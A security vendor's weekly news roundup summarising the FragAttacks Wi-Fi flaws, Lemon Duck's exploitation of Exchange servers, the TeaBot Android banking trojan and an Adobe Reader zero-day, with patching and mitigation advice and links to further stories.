FragAttacks vulnerabilities / Lemon Duck / Trojan TeaBot / Adobe Reader’s 0-day

Welcome to the newest episode of the Xopero Security Center. What is a threat of the week this time? FragAttacks vulnerabilities have been part of Wi-Fi since its release in 1997. This means that most devices produced during the last 24 years are vulnerable to the attack. How severe is this new threat? To uncover this true check the whole post below.

All Wi-Fi devices impacted by new FragAttacks vulnerabilities

Newly discovered Wi-Fi security vulnerabilities collectively known as FragAttacks (fragmentation and aggregation attacks) are impacting all Wi-Fi devices manufactured in the last 24 years.

Three of these bugs are Wi-Fi 802.11 standard design flaws in the frame aggregation and frame fragmentation functionalities. They are affecting most devices. Other bugs are programing mistakes in Wi-Fi products. We are not exaggerating by saying that for the most part, every Wi-Fi product is affected by at least one FragAttacks vulnerability and that most products are affected by several of them.

FragAttacks vulnerabilities affect all modern security protocols of Wi-Fi, including the latest WPA3 specification. Even the WEP protocol is affected. This means that several of the newly discovered design flaws have been part of Wi-Fi since its release in 1997.

How do FragAttacks strike?

Attackers who are abusing design and implementation flaws have to be in the Wi-Fi range of targeted devices to steal sensitive user data and execute malicious code following successful exploitation. But potentially the full device takeover is possible.

Now some good news. The design flaws are hard to abuse because doing so requires user interaction or is only possible when using uncommon network settings. However, the programming mistakes behind some of the FragAttacks vulnerabilities are trivial to exploit and would allow attackers to abuse unpatched Wi-Fi products with ease.

FragAttacks – a herald of the dark future?

Right now vendors are developing patches for their product to mitigate the FragAttacks bugs. Cisco Systems, HPE/Aruba Networks, Juniper Networks, Sierra Wireless, and Microsoft [1, 2, 3] have already published security updates and advisories. But what to do, if your device vendor hasn’t yet released security patches?  You can still mitigate some of the FragAttacks risks. First, ensure that all websites and online services you visit use HTTPS protocol. We advise installing the HTTPS Everywhere web browser extension – it will make this task so much easier. Additionally, you can also disable fragmentation, pairwise rekeys, and dynamic fragmentation in Wi-Fi 6 (802.11ax) devices.


Lemon Duck operators adopt MS Exchange Server vulnerabilities in new attacks

Lemon Duck hacking group is becoming active again. In the last months, hackers have been using mostly SMBGhost and Eternal Blue vulnerabilities. But as the leverage of Microsoft Exchange Server flaws shows, the group’s tactics changed and now also targets devices open to the ProxyLogon attack.

Lemon Duck operators use automated tools to scan, detect, and exploit servers before loading payloads such as Cobalt Strike DNS beacons and web shells, leading to the execution of cryptocurrency mining software and additional malware. The malware and associated PowerShell scripts will also attempt to remove antivirus products and will stop any services – including Windows Update and Windows Defender – that could hamper an infection attempt. 

To maintain persistence, the CertUtil command-line program is utilized to download two new PowerShell scripts tasked with removing AV products, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner.

Lemon Duck has also been creating decoy top-level domains (TLDs) – rather than more generic and globally used TLDs such as “.com” or “.net” – to try and obfuscate command-and-control (C2) center infrastructure. This way, they can more effectively hide C2 communications among other web traffic present in victim environments.


New Android banking trojan TeaBot found hijacking users’ credentials and SMS messages

Researchers from the Italian fraud prevention firm Cleafy’s have discovered a new Android malware targeting unsuspected users across Europe since January 2021.

Dubbed TeaBot, the malware is in the early stages of development yet equipped with capabilities like remotely taking full control of a targeted device, stealing login credentials, sending and intercepting SMS messages for additional scams including extracting banking data.

The rogue Android application, which masquerades as media and package delivery services like TeaTV, VLC Media Player, DHL, and UPS, acts as a dropper that not only loads a second-stage payload but also forces the victim into granting it accessibility service permissions.

This malware also let its operators delete existing apps from the device, change audio settings such as muting the device, read its phone book, read the ‘phone state’ meaning attackers can identify the victim’s phone number, the status of ongoing calls, current cellular network information, etc. Furthermore, TeaBot malware constantly takes screenshots of the compromised device. 

In addition, upon infecting the device TeaBot steals Google Authentication 2FA codes, compromises other accounts on the device, and last but not least it also disables the Google Play Protect feature.

The collected information is then exfiltrated every 10 seconds to a remote server controlled by the attacker.

So far, Cleafy’s threat research team has identified more than 60 banks targeted by TeaBot malware in European countries like Italy, Spain, Germany, Belgium, and the Netherlands. The malware supports 6 different languages German, English, Italian, French, Spanish, and Dutch.

How to stay safe? Scan your phone regularly for the latest threats, install Android updates regularly, and avoid installing unnecessary apps – even from Google Play Store.

Sources 12

Hackers target Windows users exploiting a 0-day vulnerability in Adobe Reader

Adobe is warning customers of a critical zero-day bug actively exploited in the wild that affects its ubiquitous Adobe Acrobat PDF reader software. A patch is available now and includes a roundup of 43 fixes for 12 of its products, including Adobe Creative Cloud Desktop Application, Illustrator, InDesign, and Magento.

One of the issues, tracked as CVE-2021-28550, is a use-after-free memory corruption flaw that affects Adobe Reader for Windows that has been exploited in the wild. Successful exploitation could lead to arbitrary code execution.

Windows users of Adobe Reader may be the only ones currently targeted. However, the bug affects eight versions of the software, including those running on Windows and macOS systems. Versions include:

  • Windows Acrobat DC & Reader DC (versions 2021.001.20150 and earlier)
  • macOS Acrobat DC & Reader DC (versions 2021.001.20149 and earlier)
  • Windows & macOS Acrobat 2020 & Acrobat Reader 2020 (2020.001.30020 and earlier versions)
  • Windows & macOS Acrobat 2017 & Acrobat Reader 2017 (2017.011.30194  and earlier versions)

Adobe did not provide technical details about the attacks, anyway this issue could be exploited by an attacker by tricking victims into opening specially crafted PDF. 

Users can update their product installations manually by choosing Help > Check for Updates.

Sources 12

Do you have thirst for knowledge? There are ten more cybersecurity stories below

1. Compsci boffin publishes proof-of-concept code for 54-year-old zero-day in Universal Turing Machine (The Register)
2. GitHub shifts away from passwords with security key support for SSH Git operations (ZDNet)
3. Organizations using Microsoft 365 experience more breaches, with more severe impacts (Help Net Security)
4. Apple kept mum about XcodeGhost malware attack against 128M users (HackRead)
5. Exploiting common URL redirection methods to create effective phishing attacks (Help Net Security)
6. Shining a Light on DARKSIDE Ransomware Operations (Fireeye)
7. Researchers Unearth 167 Fake iOS & Android Trading Apps (Dark Reading)
8. Avaddon Ransomware gang hacked France-based Acer Finance and AXA Asia (Security Affairs)
9. DarkSide ransomware call it quits after Bitcoin, servers are seized (Hack Read)
10. QNAP warns of eCh0raix ransomware and Roon Server zero-day attacks (Security Affairs)